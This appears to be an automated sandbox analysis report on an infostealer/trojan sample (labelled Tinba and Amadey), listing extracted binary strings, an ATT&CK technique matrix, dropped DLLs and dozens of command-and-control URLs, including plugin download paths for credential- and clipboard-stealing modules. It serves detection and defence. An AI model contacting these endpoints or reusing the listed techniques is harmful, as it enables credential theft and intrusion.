Source: Gxtuum.exe.0.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials In Files	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	36 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tOuVwTJrau.exe	70%	Virustotal		Browse
tOuVwTJrau.exe	66%	ReversingLabs	Win32.Infostealer.Tinba
tOuVwTJrau.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	34%	ReversingLabs	Win64.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	66%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	47%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	34%	ReversingLabs	Win64.Infostealer.Tinba

Source	Detection	Scanner	Label
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?wal=1ies.	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php&	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php&	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php$	100%	Avira URL Cloud	phishing
http://185.81.68.148/X	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.php0	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpd7	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php1	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php6	100%	Avira URL Cloud	phishing
http://185.81.68.148/wsys	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php8	100%	Avira URL Cloud	phishing
http://185.81.68.148/SysWOW64	100%	Avira URL Cloud	phishing
http://185.81.68.147/ows	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpoded	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phps	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpv	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?wal=1H;0	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpz#29	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php98	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpb	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpa	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phph	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpf	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpg	100%	Avira URL Cloud	phishing
http://185.81.68.148/	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpn	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpm	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpR	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpo	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phps	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpu	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpw	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpZ	100%	Avira URL Cloud	phishing
http://185.81.68.148/ta;	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.phpndows	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpE	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpL	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php?wal=1tesH	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpK	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	100%	Avira URL Cloud	phishing
http://185.81.68.148/Fvu5jh4DbS/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php?wal=1urn	100%	Avira URL Cloud	phishing
http://185.81.68.147/	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php?wal=1	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpbf198	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php?R	100%	Avira URL Cloud	malware
http://185.81.68.147/7vhfjke3/index.php?wal=1f	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php	100%	Avira URL Cloud	malware
http://185.81.68.148/8Fvu5jh4DbS/index.php:	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/Plugins/clip64.dll	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpX	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpded	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	true	Avira URL Cloud: malware	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php	true	Avira URL Cloud: malware	unknown
http://185.81.68.147/7vhfjke3/index.php?wal=1	true	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/7vhfjke3/index.php?wal=1ies.	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php&	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.81.68.147/7vhfjke3/index.php$	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php&	rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h	rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.81.68.148/X	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php0	rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contoso.com/License	powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php1	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpd7	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php6	rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/wsys	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php8	rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/SysWOW64	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/ows	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/Plugins/cred64.dll	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpoded	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contoso.com/	powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.phps	rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpv	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.php?wal=1H;0	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpz#29	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php98	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpb	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000B.00000002.2008936474.0000018FD6DE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E3A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2084465278.00000249B4DAF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2083831984.00000249B4DA2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.phpa	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS	rundll32.exe, 00000010.00000002.2924026197.0000000003459000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phph	rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpg	rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpf	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.2924314576.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M	rundll32.exe, 0000000C.00000002.2924024643.0000000003126000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpn	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpm	rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.2065342904.00000249ACB41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 0000000B.00000002.2008936474.0000018FD6B3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499E013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.147/7vhfjke3/index.phpo	rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpR	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phps	rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpu	rundll32.exe, 0000000C.00000002.2924024643.00000000030FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpw	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpZ	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.81.68.148/ta;	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpF	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpndows	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpE	rundll32.exe, 00000010.00000002.2924026197.000000000343F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpL	rundll32.exe, 00000004.00000002.2137636900.0000021E06674000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php?wal=1tesH	rundll32.exe, 00000004.00000002.2137915053.0000021E08558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpK	rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/Fvu5jh4DbS/index.php	rundll32.exe, 0000000C.00000002.2924024643.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.2924026197.00000000033FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.php?wal=1urn	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2008936474.0000018FD5739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CCF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b	rundll32.exe, 00000006.00000002.2139039195.000002583B470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpbf198	Gxtuum.exe, 00000001.00000002.2924314576.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://aka.ms/pscore68	powershell.exe, 0000000B.00000002.2008936474.0000018FD5511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2008958596.000002499CAD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.81.68.148/8Fvu5jh4DbS/index.php?R	rundll32.exe, 00000006.00000002.2138710552.0000025839606000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
